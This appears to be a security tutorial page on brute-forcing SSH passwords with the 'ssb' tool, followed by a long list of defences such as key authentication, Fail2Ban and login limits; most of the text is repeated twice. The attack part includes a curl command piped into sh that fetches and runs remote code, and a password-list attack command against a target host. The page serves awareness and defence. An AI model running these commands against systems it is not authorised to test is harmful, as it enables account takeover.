How to Perform SSH Brute Force Attack and How Can We Protect Our Systems from It?

PreviousEnum4Linux NextDictionary Attack via HashCat

Last updated 1 year ago

How to Perform SSH Brute Force Attack and How Can We Protect Our Systems from It?

Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.

The subject of our article is how to perform brute force attacks on systems via SSH service. For this reason, knowing some basic information will be useful to perform this test.

What is SSH?

SSH (Secure Shell) is a cryptographic network protocol and software suite used to provide secure access, file transfer, and command-line interfaces for various network services. SSH plays a crucial role in information security and is commonly used for remote access to and management of computers and servers.

What is Brute Force Attack?

A brute force attack is a term used in cybersecurity. Such attacks are used to gain access to encrypted or password-protected systems. A brute force attack attempts to access the targeted system by trying every possible encryption key or password. It essentially works by systematically trying every possible combination.

So, Lets do it!

Requirements

-> Attacker Machine(Preferably Kali) -> Victim Machine -> SSH Brute Force Tool -> Go Programming Language

Let's fetch the necessary ssh brute force tool with curl.

curl -sSfL 'https://git.io/kitabisa-ssb' | sh -s -- -b /usr/local/bin

Install the Go Programming Language

apt install golang-go

Let's enable Go Modules and run the relevant command to download the "ktbs.dev/ssb" module and add it to the project.

GO111MODULE=on go get ktbs.dev/ssb

Create the password list.

Then, lest's run the brute force command.

ssb -p 22 -w passwords.txt <AccountName>@<TargetIP>

As can be seen in a very short time, the attack was completed and the correct password was found.

How can we protect our SSH services from Brute Force Attacks?

Use Strong Passwords or Passphrases:
- Ensure that users have strong, complex passwords or passphrase-based authentication. Encourage them to use a combination of upper and lower-case letters, numbers, and special characters.
SSH Key Authentication:
- Implement SSH key-based authentication. This method is more secure than password authentication as it's not vulnerable to brute force attacks.
Change Default SSH Port:
- Change the default SSH port (Port 22) to a non-standard port. This makes it harder for automated tools to find your SSH service.
Implement Fail2Ban or SSHGuard:
- Install and configure intrusion detection systems like Fail2Ban or SSHGuard. These tools automatically block IP addresses after a certain number of failed login attempts, effectively countering brute force attacks.
SSH Configuration:
- In your SSH server configuration file (usually located at /etc/ssh/sshd_config), set the following parameters:
  - MaxAuthTries: Limit the number of authentication attempts.
  - LoginGraceTime: Shorten the allowed time for login attempts.
  - AllowUsers or AllowGroups: Specify which users or groups are allowed to SSH into the system.
Use Two-Factor Authentication (2FA):
- Implement 2FA for SSH. This adds an extra layer of security, even if an attacker obtains the password.
IP Whitelisting:
- Allow SSH access only from trusted IP addresses or IP ranges. This can be done using firewall rules.
Regularly Update SSH Software:
- Keep your SSH server software up to date to patch known vulnerabilities.
Monitor and Log:
- Monitor your SSH logs for suspicious activities and set up alerts for multiple failed login attempts.
Limit User Access:
- Only provide SSH access to users who need it. Avoid giving SSH access to all users by default.
Use Bastion Hosts:
- Implement a bastion host or jump server, which acts as an intermediary for SSH connections, further isolating your critical systems.
Disable Root Login:
- Disable direct root login via SSH. Instead, require users to log in with their own accounts and use sudo or su to gain superuser privileges.
Regularly Audit User Accounts:
- Periodically audit and remove unnecessary or inactive user accounts.
Educate Users:
- Educate users about the importance of security practices and social engineering threats.
Consider Web Application Firewalls (WAF):
- If you have a public-facing SSH service, consider using a WAF to filter and protect against malicious traffic.

PreviousEnum4Linux NextDictionary Attack via HashCat

Last updated 1 year ago

The subject of our article is how to perform brute force attacks on systems via SSH service. For this reason, knowing some basic information will be useful to perform this test.

What is SSH?

What is Brute Force Attack?

So, Lets do it!

Requirements

-> Attacker Machine(Preferably Kali) -> Victim Machine -> SSH Brute Force Tool -> Go Programming Language

Let's fetch the necessary ssh brute force tool with curl.

curl -sSfL 'https://git.io/kitabisa-ssb' | sh -s -- -b /usr/local/bin

Install the Go Programming Language

apt install golang-go

Let's enable Go Modules and run the relevant command to download the "ktbs.dev/ssb" module and add it to the project.

GO111MODULE=on go get ktbs.dev/ssb

Create the password list.

Then, lest's run the brute force command.

ssb -p 22 -w passwords.txt <AccountName>@<TargetIP>

As can be seen in a very short time, the attack was completed and the correct password was found.

How can we protect our SSH services from Brute Force Attacks?

Use Strong Passwords or Passphrases:
- Ensure that users have strong, complex passwords or passphrase-based authentication. Encourage them to use a combination of upper and lower-case letters, numbers, and special characters.
SSH Key Authentication:
- Implement SSH key-based authentication. This method is more secure than password authentication as it's not vulnerable to brute force attacks.
Change Default SSH Port:
- Change the default SSH port (Port 22) to a non-standard port. This makes it harder for automated tools to find your SSH service.
Implement Fail2Ban or SSHGuard:
- Install and configure intrusion detection systems like Fail2Ban or SSHGuard. These tools automatically block IP addresses after a certain number of failed login attempts, effectively countering brute force attacks.
SSH Configuration:
- In your SSH server configuration file (usually located at /etc/ssh/sshd_config), set the following parameters:
  - MaxAuthTries: Limit the number of authentication attempts.
  - LoginGraceTime: Shorten the allowed time for login attempts.
  - AllowUsers or AllowGroups: Specify which users or groups are allowed to SSH into the system.
Use Two-Factor Authentication (2FA):
- Implement 2FA for SSH. This adds an extra layer of security, even if an attacker obtains the password.
IP Whitelisting:
- Allow SSH access only from trusted IP addresses or IP ranges. This can be done using firewall rules.
Regularly Update SSH Software:
- Keep your SSH server software up to date to patch known vulnerabilities.
Monitor and Log:
- Monitor your SSH logs for suspicious activities and set up alerts for multiple failed login attempts.
Limit User Access:
- Only provide SSH access to users who need it. Avoid giving SSH access to all users by default.
Use Bastion Hosts:
- Implement a bastion host or jump server, which acts as an intermediary for SSH connections, further isolating your critical systems.
Disable Root Login:
- Disable direct root login via SSH. Instead, require users to log in with their own accounts and use sudo or su to gain superuser privileges.
Regularly Audit User Accounts:
- Periodically audit and remove unnecessary or inactive user accounts.
Educate Users:
- Educate users about the importance of security practices and social engineering threats.
Consider Web Application Firewalls (WAF):
- If you have a public-facing SSH service, consider using a WAF to filter and protect against malicious traffic.